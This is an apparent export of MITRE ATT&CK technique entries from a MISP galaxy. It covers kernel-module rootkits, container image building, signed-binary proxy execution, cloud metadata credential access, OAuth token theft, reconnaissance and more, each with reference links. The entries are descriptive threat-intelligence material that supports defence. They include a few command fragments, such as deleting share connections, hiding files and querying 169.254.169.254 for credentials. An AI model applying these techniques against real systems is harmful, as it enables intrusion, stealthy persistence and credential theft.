Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)

Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)

Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)

The tag is: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215"

Table 5558. Table References

Links

http://tldp.org/HOWTO/Module-HOWTO/x197.html

http://www.megasecurity.org/papers/Rootkits.pdf

http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html

https://attack.mitre.org/techniques/T1215

https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux

https://github.com/f0rb1dd3n/Reptile

https://github.com/m0nad/Diamorphine

https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/

https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Build Image on Host - T1612

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)

An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

The tag is: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612"

Table 5559. Table References

Links

https://attack.mitre.org/techniques/T1612

https://blog.aquasec.com/malicious-container-image-docker-container-host

https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild

https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

Network Share Connection Removal - T1126

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1126"

Table 5560. Table References

Links

https://attack.mitre.org/techniques/T1126

https://technet.microsoft.com/bb490717.aspx

System Script Proxy Execution - T1216

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)

The tag is: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216"

Table 5561. Table References

Links

https://attack.mitre.org/techniques/T1216

https://github.com/LOLBAS-Project/LOLBAS#criteria

https://github.com/api0cradle/UltimateAppLockerByPassList

System Binary Proxy Execution - T1218

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

The tag is: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218"

Table 5562. Table References

Links

https://attack.mitre.org/techniques/T1218

https://github.com/LOLBAS-Project/LOLBAS#criteria

https://gtfobins.github.io/gtfobins/split/

https://man7.org/linux/man-pages/man1/split.1.html

Build social network persona - T1341

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1341).

For attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites ([Facebook](https://www.facebook.com), [LinkedIn](https://www.linkedin.com), [Twitter](https://twitter.com), [Google+](https://plus.google.com), etc.). (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341"

Table 5563. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1341

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Remote access tool development - T1351

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1351).

A remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)

The tag is: misp-galaxy:mitre-attack-pattern="Remote access tool development - T1351"

Table 5564. Table References

Links

https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

https://attack.mitre.org/techniques/T1351

Container and Resource Discovery - T1613

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

The tag is: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613"

Table 5565. Table References

Links

https://attack.mitre.org/techniques/T1613

https://docs.docker.com/engine/api/v1.41/

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

Secure and protect infrastructure - T1317

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1317).

An adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. (Citation: KrebsTerracottaVPN)

The tag is: misp-galaxy:mitre-attack-pattern="Secure and protect infrastructure - T1317"

Table 5566. Table References

Links

https://attack.mitre.org/techniques/T1317

Obfuscate or encrypt code - T1319

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).

Obfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate or encrypt code - T1319"

Table 5567. Table References

Links

https://attack.mitre.org/techniques/T1319

Elevated Execution with Prompt - T1514

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it’s all broken!)

The tag is: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1514"

Table 5568. Table References

Links

https://attack.mitre.org/techniques/T1514

https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg

https://objective-see.com/blog/blog_0x2A.html

https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8

https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/

Data Encrypted for Impact - T1471

An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471"

Table 5569. Table References

Links

https://attack.mitre.org/techniques/T1471

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html

Hidden Files and Directories - T1158

To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

Windows

Users can mark specific files as hidden by using the attrib.exe binary. Simply do <code>attrib +h filename</code> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.

Linux/Mac

Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: <code>defaults write com.apple.finder AppleShowAllFiles YES</code>, and then relaunch the Finder Application.

Mac

Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158"

Table 5570. Table References

Links

https://attack.mitre.org/techniques/T1158

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

Gather Victim Org Information - T1591

Adversaries may gather information about the victim’s organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Org Information - T1591"

Table 5571. Table References

Links

https://attack.mitre.org/techniques/T1591

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

https://www.sec.gov/edgar/search-and-access

Cloud Storage Object Discovery - T1619

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Storage Object Discovery - T1619"

Table 5572. Table References

Links

https://attack.mitre.org/techniques/T1619

https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html

https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs

System Network Configuration Discovery - T1422

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems.

On Android, details of onboard network interfaces are accessible to apps through the java.net.NetworkInterface class.(Citation: NetworkInterface) Previously, the Android TelephonyManager class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager)

On iOS, gathering network configuration information is not possible without root access.

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422"

Table 5573. Table References

Links

https://attack.mitre.org/techniques/T1422

https://developer.android.com/reference/android/telephony/TelephonyManager.html

https://developer.android.com/reference/java/net/NetworkInterface.html

Cloud Instance Metadata API - T1522

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1522"

Table 5574. Table References

Links

https://attack.mitre.org/techniques/T1522

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Identify analyst level gaps - T1233

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).

Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Identify analyst level gaps - T1233"

Table 5575. Table References

Links

https://attack.mitre.org/techniques/T1233

Generate analyst intelligence requirements - T1234

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).

Analysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Generate analyst intelligence requirements - T1234"

Table 5576. Table References

Links

https://attack.mitre.org/techniques/T1234

Command and Scripting Interpreter - T1623

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s Runtime package.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.

The tag is: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1623"

Table 5577. Table References

Links

https://attack.mitre.org/techniques/T1623

https://partner.samsungknox.com/mtd

Identify security defensive capabilities - T1263

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).

Security defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify security defensive capabilities - T1263"

Table 5578. Table References

Links

https://attack.mitre.org/techniques/T1263

Use multiple DNS infrastructures - T1327

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).

A technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)

The tag is: misp-galaxy:mitre-attack-pattern="Use multiple DNS infrastructures - T1327"

Table 5579. Table References

Links

https://attack.mitre.org/techniques/T1327

Analyze application security posture - T1293

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).

An adversary can probe a victim’s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze application security posture - T1293"

Table 5580. Table References

Links

https://attack.mitre.org/techniques/T1293

Exfiltration Over C2 Channel - T1646

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1646"

Table 5581. Table References

Links

https://attack.mitre.org/techniques/T1646

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html

Endpoint Denial of Service - T1642

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.

On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode, preventing the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)

On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode; they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1642"

Table 5582. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

https://attack.mitre.org/techniques/T1642

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)

Malicious Software Development Tools - T1462

As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.

Detection: Enterprises could deploy integrity checking software to the computers that they use to develop code to detect presence of unauthorized, modified software development tools.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Software Development Tools - T1462"

Malicious Software Development Tools - T1462 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 5583. Table References

Links

https://attack.mitre.org/techniques/T1462

Identify technology usage patterns - T1264

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).

Technology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)

The tag is: misp-galaxy:mitre-attack-pattern="Identify technology usage patterns - T1264"

Table 5584. Table References

Links

https://attack.mitre.org/techniques/T1264

Generate Fraudulent Advertising Revenue - T1472

An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

The tag is: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472"

Table 5585. Table References

Links

https://attack.mitre.org/techniques/T1472

Identify sensitive personnel information - T1274

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1274).

An adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify sensitive personnel information - T1274"

Table 5586. Table References

Links

https://attack.mitre.org/techniques/T1274

Exploitation of Remote Services - T1428

Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

Depending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1428"

Table 5587. Table References

Links

https://attack.mitre.org/techniques/T1428

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html

Identify web defensive services - T1256

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).

An adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify web defensive services - T1256"

Table 5588. Table References

Links

https://attack.mitre.org/techniques/T1256

Steal Application Access Token - T1528

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft’s Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user’s OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528"

Table 5589. Table References

Links

https://attack.mitre.org/techniques/T1528

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://auth0.com/learn/refresh-tokens/

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols

https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app

https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow

https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/

https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/

Gather Victim Host Information - T1592

Adversaries may gather information about the victim’s hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Host Information - T1592"

Table 5590. Table References

Links

https://attack.mitre.org/techniques/T1592

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Abuse Elevation Control Mechanism - T1626

